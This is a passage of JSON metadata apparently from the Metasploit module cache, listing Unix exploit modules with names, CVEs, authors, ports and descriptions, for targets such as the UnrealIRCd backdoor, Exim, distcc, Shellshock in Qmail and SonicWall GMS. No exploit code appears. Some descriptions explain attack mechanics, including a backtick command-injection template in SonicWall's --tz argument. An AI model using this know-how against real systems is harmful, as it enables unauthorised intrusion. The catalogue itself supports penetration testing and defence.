"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-05-08 18:10:29 +0000",
"path": "/modules/exploits/unix/http/xdebug_unauth_exec.rb",
"is_install_path": true,
"ref_name": "unix/http/xdebug_unauth_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/irc/unreal_ircd_3281_backdoor": {
"name": "UnrealIRCD 3.2.8.1 Backdoor Command Execution",
"full_name": "exploit/unix/irc/unreal_ircd_3281_backdoor",
"rank": 600,
"disclosure_date": "2010-06-12",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a malicious backdoor that was added to the\n Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the\n Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.",
"references": [
"CVE-2010-2075",
"OSVDB-65445",
"URL-http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt"
],
"platform": "Unix",
"arch": "cmd",
"rport": 6667,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb",
"is_install_path": true,
"ref_name": "unix/irc/unreal_ircd_3281_backdoor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/local/at_persistence": {
"name": "at(1) Persistence",
"full_name": "exploit/unix/local/at_persistence",
"rank": 600,
"disclosure_date": "1997-01-01",
"type": "exploit",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module achieves persistence by executing payloads via at(1).",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/unix/local/at_persistence.rb",
"is_install_path": true,
"ref_name": "unix/local/at_persistence",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/local/chkrootkit": {
"name": "Chkrootkit Local Privilege Escalation",
"full_name": "exploit/unix/local/chkrootkit",
"rank": 0,
"disclosure_date": "2014-06-04",
"type": "exploit",
"author": [
"Thomas Stangner",
"Julien \"jvoisin\" Voisin"
],
"description": "Chkrootkit before 0.50 will run any executable file named /tmp/update\n as root, allowing a trivial privilege escalation.\n\n WfsDelay is set to 24h, since this is how often a chkrootkit scan is\n scheduled by default.",
"references": [
"CVE-2014-0476",
"OSVDB-107710",
"EDB-33899",
"BID-67813",
"CWE-20",
"URL-https://seclists.org/oss-sec/2014/q2/430"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/unix/local/chkrootkit.rb",
"is_install_path": true,
"ref_name": "unix/local/chkrootkit",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/local/emacs_movemail": {
"name": "Emacs movemail Privilege Escalation",
"full_name": "exploit/unix/local/emacs_movemail",
"rank": 600,
"disclosure_date": "1986-08-01",
"type": "exploit",
"author": [
"Markus Hess",
"Cliff Stoll",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a SUID installation of the Emacs movemail utility\n to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.\n The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.",
"references": [
"URL-https://en.wikipedia.org/wiki/Movemail",
"URL-https://en.wikipedia.org/wiki/The_Cuckoo%27s_Egg",
"URL-http://pdf.textfiles.com/academics/wilyhacker.pdf",
"URL-https://www.gnu.org/software/emacs/manual/html_node/efaq/Security-risks-with-Emacs.html",
"URL-https://www.gnu.org/software/emacs/manual/html_node/emacs/Movemail.html",
"URL-https://mailutils.org/manual/html_node/movemail.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"/usr/lib/crontab.local"
],
"mod_time": "2018-12-03 12:22:40 +0000",
"path": "/modules/exploits/unix/local/emacs_movemail.rb",
"is_install_path": true,
"ref_name": "unix/local/emacs_movemail",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/local/exim_perl_startup": {
"name": "Exim \"perl_startup\" Privilege Escalation",
"full_name": "exploit/unix/local/exim_perl_startup",
"rank": 600,
"disclosure_date": "2016-03-10",
"type": "exploit",
"author": [
"Dawid Golunski",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a Perl injection vulnerability in Exim < 4.86.2\n given the presence of the \"perl_startup\" configuration parameter.",
"references": [
"CVE-2016-1531",
"EDB-39549",
"URL-http://www.exim.org/static/doc/CVE-2016-1531.txt"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Exim < 4.86.2"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/unix/local/exim_perl_startup.rb",
"is_install_path": true,
"ref_name": "unix/local/exim_perl_startup",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/local/netbsd_mail_local": {
"name": "NetBSD mail.local Privilege Escalation",
"full_name": "exploit/unix/local/netbsd_mail_local",
"rank": 600,
"disclosure_date": "2016-07-07",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"akat1"
],
"description": "This module attempts to exploit a race condition in mail.local with SUID bit set on:\n NetBSD 7.0 - 7.0.1 (verified on 7.0.1)\n NetBSD 6.1 - 6.1.5\n NetBSD 6.0 - 6.0.6\n Successful exploitation relies on a crontab job with root privilege, which may take up to 10min to execute.",
"references": [
"URL-http://akat1.pl/?id=2",
"EDB-40141",
"CVE-2016-6253",
"URL-http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/local/netbsd_mail_local.rb",
"is_install_path": true,
"ref_name": "unix/local/netbsd_mail_local",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/local/setuid_nmap": {
"name": "Setuid Nmap Exploit",
"full_name": "exploit/unix/local/setuid_nmap",
"rank": 600,
"disclosure_date": "2012-07-19",
"type": "exploit",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Nmap's man page mentions that \"Nmap should never be installed with\n special privileges (e.g. suid root) for security reasons..\" and\n specifically avoids making any of its binaries setuid during\n installation. Nevertheless, administrators sometimes feel the need\n to do insecure things. This module abuses a setuid nmap binary by\n writing out a lua nse script containing a call to os.execute().\n\n Note that modern interpreters will refuse to run scripts on the\n command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby}\n payloads will most likely not work.",
"references": [
],
"platform": "BSD,Linux,Unix",
"arch": "cmd, x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Command payload",
"Linux x86",
"BSD x86"
],
"mod_time": "2018-01-23 10:12:15 +0000",
"path": "/modules/exploits/unix/local/setuid_nmap.rb",
"is_install_path": true,
"ref_name": "unix/local/setuid_nmap",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/misc/distcc_exec": {
"name": "DistCC Daemon Command Execution",
"full_name": "exploit/unix/misc/distcc_exec",
"rank": 600,
"disclosure_date": "2002-02-01",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module uses a documented security weakness to execute\n arbitrary commands on any system running distccd.",
"references": [
"CVE-2004-2687",
"OSVDB-13378",
"URL-http://distcc.samba.org/security.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 3632,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Target"
],
"mod_time": "2018-07-26 11:23:16 +0000",
"path": "/modules/exploits/unix/misc/distcc_exec.rb",
"is_install_path": true,
"ref_name": "unix/misc/distcc_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/misc/polycom_hdx_auth_bypass": {
"name": "Polycom Command Shell Authorization Bypass",
"full_name": "exploit/unix/misc/polycom_hdx_auth_bypass",
"rank": 300,
"disclosure_date": "2013-01-18",
"type": "exploit",
"author": [
"Paul Haas <Paul.Haas@Security-Assessment.com>",
"h00die <mike@shorebreaksecurity.com>"
],
"description": "The login component of the Polycom Command Shell on Polycom HDX\n video endpoints, running software versions 3.0.5 and earlier,\n is vulnerable to an authorization bypass when simultaneous\n connections are made to the service, allowing remote network\n attackers to gain access to a sandboxed telnet prompt without\n authentication. Versions prior to 3.0.4 contain OS command\n injection in the ping command which can be used to execute\n arbitrary commands as root.",
"references": [
"URL-http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf",
"URL-http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html",
"EDB-24494"
],
"platform": "Unix",
"arch": "cmd",
"rport": 23,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2018-11-04 06:14:26 +0000",
"path": "/modules/exploits/unix/misc/polycom_hdx_auth_bypass.rb",
"is_install_path": true,
"ref_name": "unix/misc/polycom_hdx_auth_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/misc/polycom_hdx_traceroute_exec": {
"name": "Polycom Shell HDX Series Traceroute Command Execution",
"full_name": "exploit/unix/misc/polycom_hdx_traceroute_exec",
"rank": 600,
"disclosure_date": "2017-11-12",
"type": "exploit",
"author": [
"Mumbai",
"staaldraad",
"Paul Haas <Paul.Haas@Security-Assessment.com>",
"h00die <mike@shorebreaksecurity.com>"
],
"description": "Within Polycom command shell, a command execution flaw exists in\n lan traceroute, one of the dev commands, which allows for an\n attacker to execute arbitrary payloads with telnet or openssl.",
"references": [
"URL-https://staaldraad.github.io/2017/11/12/polycom-hdx-rce/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 23,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-12-04 12:47:40 +0000",
"path": "/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb",
"is_install_path": true,
"ref_name": "unix/misc/polycom_hdx_traceroute_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/misc/qnx_qconn_exec": {
"name": "QNX qconn Command Execution",
"full_name": "exploit/unix/misc/qnx_qconn_exec",
"rank": 600,
"disclosure_date": "2012-09-04",
"type": "exploit",
"author": [
"David Odell",
"Mor!p3r",
"bcoles <bcoles@gmail.com>"
],
"description": "This module uses the qconn daemon on QNX systems to gain a shell.\n\n The QNX qconn daemon does not require authentication and allows\n remote users to execute arbitrary operating system commands.\n\n This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n and 6.5.0 SP1 (x86).",
"references": [
"EDB-21520",
"URL-https://www.optiv.com/blog/pentesting-qnx-neutrino-rtos",
"URL-http://www.qnx.com/developers/docs/6.5.0SP1/neutrino/utilities/q/qconn.html",
"URL-http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.neutrino_utilities/q/qconn.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 8000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/misc/qnx_qconn_exec.rb",
"is_install_path": true,
"ref_name": "unix/misc/qnx_qconn_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/misc/spamassassin_exec": {
"name": "SpamAssassin spamd Remote Command Execution",
"full_name": "exploit/unix/misc/spamassassin_exec",
"rank": 600,
"disclosure_date": "2006-06-06",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a flaw in the SpamAssassin spamd service by specifying\n a malicious vpopmail User header, when running with vpopmail and paranoid\n modes enabled (non-default). Versions prior to v3.1.3 are vulnerable.",
"references": [
"CVE-2006-2447",
"OSVDB-26177",
"BID-18290",
"URL-http://spamassassin.apache.org/advisories/cve-2006-2447.txt"
],
"platform": "Unix",
"arch": "cmd",
"rport": 783,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/unix/misc/spamassassin_exec.rb",
"is_install_path": true,
"ref_name": "unix/misc/spamassassin_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/misc/xerox_mfp": {
"name": "Xerox Multifunction Printers (MFP) \"Patch\" DLM Vulnerability",
"full_name": "exploit/unix/misc/xerox_mfp",
"rank": 400,
"disclosure_date": "2012-03-07",
"type": "exploit",
"author": [
"Deral \"Percentx\" Heiland",
"Pete \"Bokojan\" Arzamendi"
],
"description": "This module exploits a vulnerability found in Xerox Multifunction Printers (MFP). By\n supplying a modified Dynamic Loadable Module (DLM), it is possible to execute arbitrary\n commands under root privileges.",
"references": [
"BID-52483",
"URL-http://www.xerox.com/download/security/security-bulletin/1284332-2ddc5-4baa79b70ac40/cert_XRX12-003_v1.1.pdf",
"URL-http://foofus.net/goons/percx/Xerox_hack.pdf"
],
"platform": "Unix",
"arch": "cmd",
"rport": 9100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-08 10:04:47 +0000",
"path": "/modules/exploits/unix/misc/xerox_mfp.rb",
"is_install_path": true,
"ref_name": "unix/misc/xerox_mfp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/misc/zabbix_agent_exec": {
"name": "Zabbix Agent net.tcp.listen Command Injection",
"full_name": "exploit/unix/misc/zabbix_agent_exec",
"rank": 600,
"disclosure_date": "2009-09-10",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a metacharacter injection vulnerability\n in the FreeBSD and Solaris versions of the Zabbix agent. This flaw\n can only be exploited if the attacker can hijack the IP address\n of an authorized server (as defined in the configuration file).",
"references": [
"CVE-2009-4502",
"OSVDB-60956",
"URL-https://support.zabbix.com/browse/ZBX-1032"
],
"platform": "Unix",
"arch": "cmd",
"rport": 10050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/misc/zabbix_agent_exec.rb",
"is_install_path": true,
"ref_name": "unix/misc/zabbix_agent_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/polycom_hdx_auth_bypass": {
"name": "Polycom Command Shell Authorization Bypass",
"full_name": "exploit/unix/polycom_hdx_auth_bypass",
"rank": 300,
"disclosure_date": "2013-01-18",
"type": "exploit",
"author": [
"Paul Haas <Paul.Haas@Security-Assessment.com>",
"h00die <mike@shorebreaksecurity.com>"
],
"description": "The login component of the Polycom Command Shell on Polycom HDX\n video endpoints, running software versions 3.0.5 and earlier,\n is vulnerable to an authorization bypass when simultaneous\n connections are made to the service, allowing remote network\n attackers to gain access to a sandboxed telnet prompt without\n authentication. Versions prior to 3.0.4 contain OS command\n injection in the ping command which can be used to execute\n arbitrary commands as root.",
"references": [
"URL-http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf",
"URL-http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html",
"EDB-24494"
],
"platform": "Unix",
"arch": "cmd",
"rport": 23,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2018-11-04 06:14:26 +0000",
"path": "/modules/exploits/unix/polycom_hdx_auth_bypass.rb",
"is_install_path": true,
"ref_name": "unix/polycom_hdx_auth_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/smtp/clamav_milter_blackhole": {
"name": "ClamAV Milter Blackhole-Mode Remote Code Execution",
"full_name": "exploit/unix/smtp/clamav_milter_blackhole",
"rank": 600,
"disclosure_date": "2007-08-24",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter'\n (Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.\n When implemented with black hole mode enabled, it is possible to execute\n commands remotely due to an insecure popen call.",
"references": [
"CVE-2007-4560",
"OSVDB-36909",
"BID-25439",
"EDB-4761"
],
"platform": "Unix",
"arch": "cmd",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/unix/smtp/clamav_milter_blackhole.rb",
"is_install_path": true,
"ref_name": "unix/smtp/clamav_milter_blackhole",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/smtp/exim4_string_format": {
"name": "Exim4 string_format Function Heap Buffer Overflow",
"full_name": "exploit/unix/smtp/exim4_string_format",
"rank": 600,
"disclosure_date": "2010-12-07",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits a heap buffer overflow within versions of Exim prior to\n version 4.69. By sending a specially crafted message, an attacker can corrupt the\n heap and execute arbitrary code with the privileges of the Exim daemon.\n\n The root cause is that no check is made to ensure that the buffer is not full\n prior to handling '%s' format specifiers within the 'string_vformat' function.\n In order to trigger this issue, we get our message rejected by sending a message\n that is too large. This will call into log_write to log rejection headers (which\n is a default configuration setting). After filling the buffer, a long header\n string is sent. In a successful attempt, it overwrites the ACL for the 'MAIL\n FROM' command. By sending a second message, the string we sent will be evaluated\n with 'expand_string' and arbitrary shell commands can be executed.\n\n It is likely that this issue could also be exploited using other techniques such\n as targeting in-band heap management structures, or perhaps even function pointers\n stored in the heap. However, these techniques would likely be far more platform\n specific, more complicated, and less reliable.\n\n This bug was originally found and reported in December 2008, but was not\n properly handled as a security issue. Therefore, there was a 2 year lag time\n between when the issue was fixed and when it was discovered being exploited\n in the wild. At that point, the issue was assigned a CVE and began being\n addressed by downstream vendors.\n\n An additional vulnerability, CVE-2010-4345, was also used in the attack that\n led to the discovery of the danger of this bug. This bug allows a local user to\n gain root privileges from the Exim user account. If the Perl interpreter is\n found on the remote system, this module will automatically exploit the\n secondary bug as well to get root.",
"references": [
"CVE-2010-4344",
"CVE-2010-4345",
"OSVDB-69685",
"OSVDB-69860",
"BID-45308",
"BID-45341",
"URL-https://seclists.org/oss-sec/2010/q4/311",
"URL-http://www.gossamer-threads.com/lists/exim/dev/89477",
"URL-http://bugs.exim.org/show_bug.cgi?id=787",
"URL-http://git.exim.org/exim.git/commitdiff/24c929a27415c7cfc7126c47e4cad39acf3efa6b"
],
"platform": "Unix",
"arch": "cmd",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"Automatic"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/unix/smtp/exim4_string_format.rb",
"is_install_path": true,
"ref_name": "unix/smtp/exim4_string_format",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/smtp/morris_sendmail_debug": {
"name": "Morris Worm sendmail Debug Mode Shell Escape",
"full_name": "exploit/unix/smtp/morris_sendmail_debug",
"rank": 200,
"disclosure_date": "1988-11-02",
"type": "exploit",
"author": [
"Robert Tappan Morris",
"Cliff Stoll",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits sendmail's well-known historical debug mode to\n escape to a shell and execute commands in the SMTP RCPT TO command.\n\n This vulnerability was exploited by the Morris worm on 1988-11-02.\n Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.\n\n Currently only cmd/unix/reverse and cmd/unix/generic are supported.",
"references": [
"URL-https://en.wikipedia.org/wiki/Morris_worm",
"URL-https://spaf.cerias.purdue.edu/tech-reps/823.pdf",
"URL-https://github.com/arialdomartini/morris-worm",
"URL-http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH"
],
"platform": "Unix",
"arch": "cmd",
"rport": 25,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"@(#)version.c 5.51 (Berkeley) 5/2/86"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/unix/smtp/morris_sendmail_debug.rb",
"is_install_path": true,
"ref_name": "unix/smtp/morris_sendmail_debug",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/smtp/qmail_bash_env_exec": {
"name": "Qmail SMTP Bash Environment Variable Injection (Shellshock)",
"full_name": "exploit/unix/smtp/qmail_bash_env_exec",
"rank": 300,
"disclosure_date": "2014-09-24",
"type": "exploit",
"author": [
"Mario Ledo (Metasploit module)",
"Gabriel Follon (Metasploit module)",
"Kyle George (Vulnerability discovery)"
],
"description": "This module exploits a shellshock vulnerability on Qmail, a public\n domain MTA written in C that runs on Unix systems.\n Due to the lack of validation on the MAIL FROM field, it is possible to\n execute shell code on a system with a vulnerable BASH (Shellshock).\n This flaw works on the latest Qmail versions (qmail-1.03 and\n netqmail-1.06).\n However, in order to execute code, /bin/sh has to be linked to bash\n (usually default configuration) and a valid recipient must be set on the\n RCPT TO field (usually admin@exampledomain.com).\n The exploit does not work on the \"qmailrocks\" community version\n as it ensures the MAILFROM field is well-formed.",
"references": [
"CVE-2014-6271",
"CWE-94",
"OSVDB-112004",
"EDB-34765",
"URL-https://seclists.org/oss-sec/2014/q3/649",
"URL-https://lists.gt.net/qmail/users/138578"
],
"platform": "Unix",
"arch": "cmd",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"Automatic"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/unix/smtp/qmail_bash_env_exec.rb",
"is_install_path": true,
"ref_name": "unix/smtp/qmail_bash_env_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/sonicwall/sonicwall_xmlrpc_rce": {
"name": "SonicWall Global Management System XMLRPC set_time_zone Unauth RCE",
"full_name": "exploit/unix/sonicwall/sonicwall_xmlrpc_rce",
"rank": 600,
"disclosure_date": "2016-07-22",
"type": "exploit",
"author": [
"Michael Flanders",
"kernelsmith"
],
"description": "This module exploits a vulnerability in SonicWall Global\n Management System Virtual Appliance versions 8.1 (Build 8110.1197)\n and below. This virtual appliance can be downloaded from\n http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a\n holistic way to manage your entire network security environment.'\n\n These vulnerable versions (8.1 Build 8110.1197 and below) do not\n prevent unauthenticated, external entities from making XML-RPC\n requests to port 21009 of the virtual app. After the XML-RPC call\n is made, a shell script is called like so:\n 'timeSetup.sh --tz=\"`command injection here`\"' --usentp=\"blah\"'.",
"references": [
"URL-https://www.digitaldefense.com/digital-defense/vrt-discoveries/",
"URL-https://slides.com/kernelsmith/bsidesaustin2018/#/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"SonicWall Global Management System Virtual Appliance"
],
"mod_time": "2019-03-07 10:29:15 +0000",
"path": "/modules/exploits/unix/sonicwall/sonicwall_xmlrpc_rce.rb",
"is_install_path": true,
"ref_name": "unix/sonicwall/sonicwall_xmlrpc_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/ssh/array_vxag_vapv_privkey_privesc": {
"name": "Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution",
"full_name": "exploit/unix/ssh/array_vxag_vapv_privkey_privesc",
"rank": 600,
"disclosure_date": "2014-02-03",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a default hardcoded private SSH key or default hardcoded\n login and password in the vAPV 8.3.2.17 and vxAG 9.2.0.34 appliances made\n by Array Networks. After logging in as the unprivileged user, it's possible to modify\n the world-writable file /ca/bin/monitor.sh with attacker-supplied arbitrary code.\n Execution is possible by using the backend tool, running setuid, to turn the debug\n monitoring on. This makes it possible to trigger a payload with root privileges.",
"references": [
"OSVDB-104652",
"OSVDB-104653",
"OSVDB-104654",
"PACKETSTORM-125761"
],
"platform": "Unix",
"arch": "cmd",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"vAPV 8.3.2.17 / vxAG 9.2.0.34"
],
"mod_time": "2018-08-15 21:27:40 +0000",
"path": "/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb",
"is_install_path": true,
"ref_name": "unix/ssh/array_vxag_vapv_privkey_privesc",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/ssh/tectia_passwd_changereq": {
"name": "Tectia SSH USERAUTH Change Request Password Reset Vulnerability",
"full_name": "exploit/unix/ssh/tectia_passwd_changereq",
"rank": 600,
"disclosure_date": "2012-12-01",
"type": "exploit",
"author": [
"kingcope",
"bperry",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in Tectia SSH server for Unix-based\n platforms. The bug is caused by a SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ request\n before password authentication, allowing any remote user to bypass the login\n routine, and then gain access as root.",
"references": [
"CVE-2012-5975",
"EDB-23082",
"OSVDB-88103",
"URL-https://seclists.org/fulldisclosure/2012/Dec/12"
],
"platform": "Unix",
"arch": "cmd",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Unix-based Tectia SSH 6.3 or prior"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/unix/ssh/tectia_passwd_changereq.rb",
"is_install_path": true,
"ref_name": "unix/ssh/tectia_passwd_changereq",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/actualanalyzer_ant_cookie_exec": {
"name": "ActualAnalyzer 'ant' Cookie Command Execution",
"full_name": "exploit/unix/webapp/actualanalyzer_ant_cookie_exec",
"rank": 600,
"disclosure_date": "2014-08-28",
"type": "exploit",
"author": [
"Benjamin Harris",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a command execution vulnerability in\n ActualAnalyzer version 2.81 and prior.\n\n The 'aa.php' file allows unauthenticated users to\n execute arbitrary commands in the 'ant' cookie.",
"references": [
"CVE-2014-5470",
"EDB-34450",
"OSVDB-110601"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ActualAnalyzer <= 2.81"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/actualanalyzer_ant_cookie_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/arkeia_upload_exec": {
"name": "Western Digital Arkeia Remote Code Execution",
"full_name": "exploit/unix/webapp/arkeia_upload_exec",
"rank": 600,
"disclosure_date": "2013-09-16",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a vulnerability found in Western Digital Arkeia Appliance\n version 10.0.10 and lower. By abusing the upload.php script,\n a malicious user can upload arbitrary code to the ApplianceUpdate file in the temp\n directory without authentication. Abusing the local file inclusion in the lang\n cookie to parse this file results in arbitrary code execution, also without\n authentication. The module has been tested successfully on Arkeia 10.0.10. The issues\n have been fixed in version 10.1.10.",
"references": [
"OSVDB-97614",
"OSVDB-97615",
"EDB-28330"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Western Digital Arkeia Appliance 10.0.10"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/arkeia_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/arkeia_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/awstats_configdir_exec": {
"name": "AWStats configdir Remote Command Execution",
"full_name": "exploit/unix/webapp/awstats_configdir_exec",
"rank": 600,
"disclosure_date": "2005-01-15",
"type": "exploit",
"author": [
"Matteo Cantoni <goony@nothink.org>",
"hdm <x@hdm.io>"
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n AWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2\n are vulnerable.",
"references": [
"CVE-2005-0116",
"OSVDB-13002",
"BID-12298",
"URL-http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/awstats_configdir_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/awstats_configdir_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
